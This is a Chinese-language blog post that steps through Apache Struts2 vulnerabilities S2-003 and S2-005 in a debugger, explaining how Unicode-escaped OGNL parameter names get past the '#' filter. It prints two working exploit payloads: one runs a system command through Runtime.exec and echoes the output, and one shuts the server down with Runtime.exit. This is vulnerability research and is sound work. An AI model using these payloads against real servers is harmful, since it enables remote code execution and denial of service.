<!DOCTYPE html>


  <html class="dark page-post">


<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="utf-8">
  
  <title>Struts2漏洞调试笔记[S2-003、S2-005] | 梅子酒の笔记本</title>

  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">

  
    <meta name="keywords" content="forsigner,前端,设计,Hexo主题,前端开发,用户体验,设计,frontend,design,nodejs,JavaScript">
  

  <meta name="description" content="环境搭建 因为影响版本包括了S2-001的范围，因此我继续使用Struts2.0.1的包。 将Struts2的struts2-showcase-2.0.1.war放到Tomcat下的webapps文件夹，便完成了环境搭建，运行后，访问链接:  http://localhost:8080/struts2-showcase-2.0.1/showcase.action   调试分析 选取网上常见的PO">
<meta property="og:type" content="article">
<meta property="og:title" content="Struts2漏洞调试笔记[S2-003、S2-005]">
<meta property="og:url" content="https://meizjm3i.github.io/2019/02/01/Struts2漏洞调试笔记-S2-003、S2-005/index.html">
<meta property="og:site_name" content="梅子酒の笔记本">
<meta property="og:description" content="环境搭建 因为影响版本包括了S2-001的范围，因此我继续使用Struts2.0.1的包。 将Struts2的struts2-showcase-2.0.1.war放到Tomcat下的webapps文件夹，便完成了环境搭建，运行后，访问链接:  http://localhost:8080/struts2-showcase-2.0.1/showcase.action   调试分析 选取网上常见的PO">
<meta property="og:locale" content="default">
<meta property="og:image" content="https://s2.ax1x.com/2019/06/27/Znf7W9.jpg">
<meta property="og:image" content="https://s2.ax1x.com/2019/06/27/ZnfTJJ.jpg">
<meta property="og:image" content="https://s2.ax1x.com/2019/06/27/ZnfhZT.jpg">
<meta property="og:image" content="https://s2.ax1x.com/2019/06/27/Znf5oF.jpg">
<meta property="og:image" content="https://s2.ax1x.com/2019/06/27/Znf2Mq.jpg">
<meta property="og:image" content="https://s2.ax1x.com/2019/06/27/Znfczn.jpg">
<meta property="og:image" content="https://s2.ax1x.com/2019/06/27/Znf4dU.jpg">
<meta property="og:image" content="https://s2.ax1x.com/2019/06/27/Znf6Rs.jpg">
<meta property="og:image" content="https://s2.ax1x.com/2019/06/27/ZnfWLV.jpg">
<meta property="og:image" content="https://s2.ax1x.com/2019/06/27/ZnfsiQ.jpg">
<meta property="og:image" content="https://s2.ax1x.com/2019/06/27/ZnfDIg.png">
<meta property="og:image" content="https://s2.ax1x.com/2019/06/27/ZnfyGj.png">
<meta property="og:image" content="https://s2.ax1x.com/2019/06/27/Znfdqf.png">
<meta property="og:image" content="https://s2.ax1x.com/2019/06/27/Znf0Z8.jpg">
<meta property="og:image" content="https://s2.ax1x.com/2019/06/27/ZnfasP.jpg">
<meta property="og:image" content="https://s2.ax1x.com/2019/06/27/ZnfBdS.jpg">
<meta property="og:updated_time" content="2019-06-27T07:26:59.905Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="Struts2漏洞调试笔记[S2-003、S2-005]">
<meta name="twitter:description" content="环境搭建 因为影响版本包括了S2-001的范围，因此我继续使用Struts2.0.1的包。 将Struts2的struts2-showcase-2.0.1.war放到Tomcat下的webapps文件夹，便完成了环境搭建，运行后，访问链接:  http://localhost:8080/struts2-showcase-2.0.1/showcase.action   调试分析 选取网上常见的PO">
<meta name="twitter:image" content="https://s2.ax1x.com/2019/06/27/Znf7W9.jpg">

  

  
    <link rel="icon" href="/favicon.ico">
  

  <link href="/css/styles.css?v=c114cbeddx" rel="stylesheet">


  
    <link rel="stylesheet" href="/css/personal-style.css">
  

  
<!-- Google Analytics -->
<script data-ad-client="ca-pub-3123300635832428" async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>

<script type="text/javascript">
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
})(window,document,'script','//www.google-analytics.com/analytics.js','ga');

ga('create', 'UA-38189205-1', 'auto');
ga('send', 'pageview');

</script>
<!-- End Google Analytics -->


  
  <script type="text/javascript">
    var _hmt = _hmt || [];
    (function() {
      var hm = document.createElement("script");
      hm.src = "//hm.baidu.com/hm.js?57e94d016e201fba3603a8a2b0263af0";
      var s = document.getElementsByTagName("script")[0];
      s.parentNode.insertBefore(hm, s);
    })();
  </script>


  
  <script type="text/javascript">
	(function(){
	    var bp = document.createElement('script');
	    var curProtocol = window.location.protocol.split(':')[0];
	    if (curProtocol === 'https') {
	        bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';        
	    }
	    else {
	        bp.src = 'http://push.zhanzhang.baidu.com/push.js';
	    }
	    var s = document.getElementsByTagName("script")[0];
	    s.parentNode.insertBefore(bp, s);
	})();
  </script>



  

</head>
</html>
<body>


  
    <span id="toolbox-mobile" class="toolbox-mobile">导航</span>
  

  <div class="post-header LEFT">
   
  <div class="toolbox">
    <a class="toolbox-entry" href="/">
      <span class="toolbox-entry-text">导航</span>
      <i class="icon-angle-down"></i>
      <i class="icon-home"></i>
    </a>
    <ul class="list-toolbox">
      
        <li class="item-toolbox">
          <a
            class="CIRCLE"
            href="/archives/"
            rel="noopener noreferrer"
            target="_self"
            >
            博客
          </a>
        </li>
      
        <li class="item-toolbox">
          <a
            class="CIRCLE"
            href="/about/"
            rel="noopener noreferrer"
            target="_self"
            >
            关于
          </a>
        </li>
      
        <li class="item-toolbox">
          <a
            class="CIRCLE"
            href="/atom.xml"
            rel="noopener noreferrer"
            target="_blank"
            >
            RSS
          </a>
        </li>
      
    </ul>
  </div>


</div>




<div class="content content-post LEFT">
   <article id="post-Struts2漏洞调试笔记-S2-003、S2-005" class="article article-type-post" itemprop="blogPost">
  <header class="article-header">
    <h1 class="post-title">Struts2漏洞调试笔记[S2-003、S2-005]</h1>

    <div class="article-meta">
      <span>
        <i class="icon-calendar"></i>
        <span>2019.02.01</span>
      </span>

      
        <span class="article-author">
          <i class="icon-user"></i>
          <span>Meizj</span>
        </span>
      

      
  <span class="article-category">
    <i class="icon-list"></i>
    <a class="article-category-link" href="/categories/技术/">技术</a>
  </span>



      

      
      
    </div>
  </header>

  <div class="article-content">
    
      <h2 id="环境搭建"><a class="markdownIt-Anchor" href="#环境搭建"></a> 环境搭建</h2>
<p>因为影响版本包括了S2-001的范围，因此我继续使用Struts2.0.1的包。</p>
<p>将Struts2的struts2-showcase-2.0.1.war放到Tomcat下的webapps文件夹，便完成了环境搭建，运行后，访问链接:</p>
<blockquote>
<p><a href="http://localhost:8080/struts2-showcase-2.0.1/showcase.action" target="_blank" rel="noopener">http://localhost:8080/struts2-showcase-2.0.1/showcase.action</a></p>
</blockquote>
<h2 id="调试分析"><a class="markdownIt-Anchor" href="#调试分析"></a> 调试分析</h2>
<p>选取网上常见的POC作调试用:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">(&apos;\u0023context[\&apos;xwork.MethodAccessor.denyMethodExecution\&apos;]\u003dfalse&apos;)(bla)(bla)&amp;(&apos;\u0023_memberAccess.excludeProperties\u003d@java.util.Collections@EMPTY_SET&apos;)(kxlzx)(kxlzx)&amp;(&apos;\u0023mycmd\u003d\&apos;ipconfig\&apos;&apos;)(bla)(bla)&amp;(&apos;\u0023myret\u003d@java.lang.Runtime@getRuntime().exec(\u0023mycmd)&apos;)(bla)(bla)&amp;(A)((&apos;\u0023mydat\u003dnew\40java.io.DataInputStream(\u0023myret.getInputStream())&apos;)(bla))&amp;(B)((&apos;\u0023myres\u003dnew\40byte[51020]&apos;)(bla))&amp;(C)((&apos;\u0023mydat.readFully(\u0023myres)&apos;)(bla))&amp;(D)((&apos;\u0023mystr\u003dnew\40java.lang.String(\u0023myres)&apos;)(bla))&amp;(&apos;\u0023myout\u003d@org.apache.struts2.ServletActionContext@getResponse()&apos;)(bla)(bla)&amp;(E)((&apos;\u0023myout.getWriter().println(\u0023mystr)&apos;)(bla))</span><br></pre></td></tr></table></figure>
<p>从官网的<a href="https://cwiki.apache.org/confluence/display/WW/S2-003" target="_blank" rel="noopener">S2-003公告</a>分析，触发点位于<code>ParametersInterceptor</code>，注意调试showcase要先把断点位置打好，否则会出现调试不出现源码的情况。</p>
<p><img src="https://s2.ax1x.com/2019/06/27/Znf7W9.jpg" alt></p>
<p><code>step over</code>到<code>getValueStack()</code>断点位置，看一下变量情况:</p>
<p><img src="https://s2.ax1x.com/2019/06/27/ZnfTJJ.jpg" alt></p>
<p><code>parameters</code>正常赋值，<code>step into</code>进入<code>setParameters()</code>:</p>
<p><img src="https://s2.ax1x.com/2019/06/27/ZnfhZT.jpg" alt></p>
<p>经过循环取值后，会依次处理传入的参数:</p>
<p><img src="https://s2.ax1x.com/2019/06/27/Znf5oF.jpg" alt></p>
<p><code>entry</code>被赋值后，进阶着便赋值给了<code>name</code>，而接下来则会对<code>name</code>进行格式校验，跟入<code>acceptableName</code>:</p>
<p><img src="https://s2.ax1x.com/2019/06/27/Znf2Mq.jpg" alt></p>
<p>此处会检验是否存在<code>=</code>,<code>,</code>,<code>#</code>,<code>:</code>这些符号，存在的话便返回<code>-1</code>，而<code>-1</code>则无法继续执行接下来的语句。</p>
<p>在109行调用<code>setValue()</code>:</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">try</span> &#123;</span><br><span class="line">    stack.setValue(name, value);</span><br><span class="line">&#125; <span class="keyword">catch</span> (RuntimeException var14) &#123;</span><br><span class="line">    Boolean devMode = (Boolean)stack.getContext().get(<span class="string">"__devMode"</span>);</span><br><span class="line">    <span class="keyword">if</span> (devMode != <span class="keyword">null</span> &amp;&amp; devMode) &#123;</span><br><span class="line">        String developerNotification = LocalizedTextUtil.findText(ParametersInterceptor.class, <span class="string">"webwork.messages.devmode.notification"</span>, ActionContext.getContext().getLocale(), <span class="string">"Developer Notification (set webwork.devMode to false to disable this message):\n&#123;0&#125;"</span>, <span class="keyword">new</span> Object[]&#123;var14.getMessage()&#125;);</span><br><span class="line">        LOG.error(developerNotification);</span><br><span class="line">        <span class="keyword">if</span> (action <span class="keyword">instanceof</span> ValidationAware) &#123;</span><br><span class="line">            ((ValidationAware)action).addActionMessage(developerNotification);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        LOG.error(<span class="string">"ParametersInterceptor - [setParameters]: Unexpected Exception catched: "</span> + var14.getMessage());</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>步入<code>setValue()</code>:</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">public</span> <span class="keyword">void</span> <span class="title">setValue</span><span class="params">(String expr, Object value)</span> </span>&#123;</span><br><span class="line">    <span class="keyword">this</span>.setValue(expr, value, <span class="keyword">this</span>.isDevModeEnabled());</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>继续步入<code>setValue</code>:</p>
<p><img src="https://s2.ax1x.com/2019/06/27/Znfczn.jpg" alt></p>
<p>步入第110行处的<code>OgnlUtil.setValue(expr, context, this.root, value)</code>:</p>
<p><img src="https://s2.ax1x.com/2019/06/27/Znf4dU.jpg" alt></p>
<p>步入<code>compile</code>:</p>
<p><img src="https://s2.ax1x.com/2019/06/27/Znf6Rs.jpg" alt></p>
<p>进入<code>Ognl.parseExpression(express)</code>:</p>
<p><img src="https://s2.ax1x.com/2019/06/27/ZnfWLV.jpg" alt></p>
<p><img src="https://s2.ax1x.com/2019/06/27/ZnfsiQ.jpg" alt></p>
<p><code>expression</code>函数中的逻辑主要为进行字符处理，而<code>\u0023</code>转变为<code>#</code>则在它调用<code>readChar()</code>函数进行处理时完成，当遇到<code>\</code>与<code>u</code>时，将后续的数字处理为十六进制:</p>
<p><img src="https://s2.ax1x.com/2019/06/27/ZnfDIg.png" alt></p>
<p><img src="https://s2.ax1x.com/2019/06/27/ZnfyGj.png" alt></p>
<p><img src="https://s2.ax1x.com/2019/06/27/Znfdqf.png" alt></p>
<p>从<code>Variables</code>中可以看到，已经完成了<code>\u0023</code>到<code>#</code>的转变.下图为完成字符处理后，返回<code>compile</code>的结果:</p>
<p><img src="https://s2.ax1x.com/2019/06/27/Znf0Z8.jpg" alt></p>
<p>以上语句最终在<code>evaluateGetValueBody</code>函数中进行执行:</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">protected</span> Object <span class="title">evaluateGetValueBody</span><span class="params">(OgnlContext context, Object source)</span> <span class="keyword">throws</span> OgnlException </span>&#123;</span><br><span class="line">    context.setCurrentObject(source);</span><br><span class="line">    context.setCurrentNode(<span class="keyword">this</span>);</span><br><span class="line">    <span class="keyword">if</span> (!<span class="keyword">this</span>.constantValueCalculated) &#123;</span><br><span class="line">        <span class="keyword">this</span>.constantValueCalculated = <span class="keyword">true</span>;</span><br><span class="line">        <span class="keyword">this</span>.hasConstantValue = <span class="keyword">this</span>.isConstant(context);</span><br><span class="line">        <span class="keyword">if</span> (<span class="keyword">this</span>.hasConstantValue) &#123;</span><br><span class="line">            <span class="keyword">this</span>.constantValue = <span class="keyword">this</span>.getValueBody(context, source);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> <span class="keyword">this</span>.hasConstantValue ? <span class="keyword">this</span>.constantValue : <span class="keyword">this</span>.getValueBody(context, source);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<h2 id="延伸至s2-005"><a class="markdownIt-Anchor" href="#延伸至s2-005"></a> 延伸至S2-005</h2>
<p>在出现S2-003后，官方采用的修补方法为:</p>
<p><img src="https://s2.ax1x.com/2019/06/27/ZnfasP.jpg" alt></p>
<p>正如公告所说的，这不是一个很好的解决方式，因此也直接导致了S2-005的产生，仅需要对<code>allowStaticMethodAccess</code>及<code>denyMethodExecution</code>属性重新进行设置即可重新利用上下文.</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">(&apos;\u0023_memberAccess[\&apos;allowStaticMethodAccess\&apos;]&apos;)(meh)=true&amp;(aaa)((&apos;\u0023context[\&apos;xwork.MethodAccessor.denyMethodExecution\&apos;]\u003d\u0023foo&apos;)(\u0023foo\u003dnew%20java.lang.Boolean(&quot;false&quot;)))&amp;(asdf)((&apos;\u0023rt.exit(1)&apos;)(\u0023rt\u003d@java.lang.Runtime@getRuntime()))=1</span><br></pre></td></tr></table></figure>
<p>而对于S2-005，官方则直接建议升级至Struts 2.2.1:</p>
<p><img src="https://s2.ax1x.com/2019/06/27/ZnfBdS.jpg" alt></p>

    
  </div>

</article>


   

   



</div>


  <a id="backTop" class="back-top">
    <i class="icon-angle-up"></i>
  </a>




  <div class="modal" id="modal">
  <span id="cover" class="cover hide"></span>
  <div id="modal-dialog" class="modal-dialog hide-dialog">
    <div class="modal-header">
      <span id="close" class="btn-close">关闭</span>
    </div>
    <hr>
    <div class="modal-body">
      <ul class="list-toolbox">
        
          <li class="item-toolbox">
            <a
              class="CIRCLE"
              href="/archives/"
              rel="noopener noreferrer"
              target="_self"
              >
              博客
            </a>
          </li>
        
          <li class="item-toolbox">
            <a
              class="CIRCLE"
              href="/about/"
              rel="noopener noreferrer"
              target="_self"
              >
              关于
            </a>
          </li>
        
          <li class="item-toolbox">
            <a
              class="CIRCLE"
              href="/atom.xml"
              rel="noopener noreferrer"
              target="_blank"
              >
              RSS
            </a>
          </li>
        
      </ul>

    </div>
  </div>
</div>



  
      <div class="fexo-comments comments-post">
    

    

    
    

    

    
    

    

  </div>

  

  <script type="text/javascript">
  function loadScript(url, callback) {
    var script = document.createElement('script')
    script.type = 'text/javascript';

    if (script.readyState) { //IE
      script.onreadystatechange = function() {
        if (script.readyState == 'loaded' ||
          script.readyState == 'complete') {
          script.onreadystatechange = null;
          callback();
        }
      };
    } else { //Others
      script.onload = function() {
        callback();
      };
    }

    script.src = url;
    document.getElementsByTagName('head')[0].appendChild(script);
  }

  window.onload = function() {
    loadScript('/js/bundle.js?235683', function() {
      // load success
    });
  }
</script>

</body>
</html>
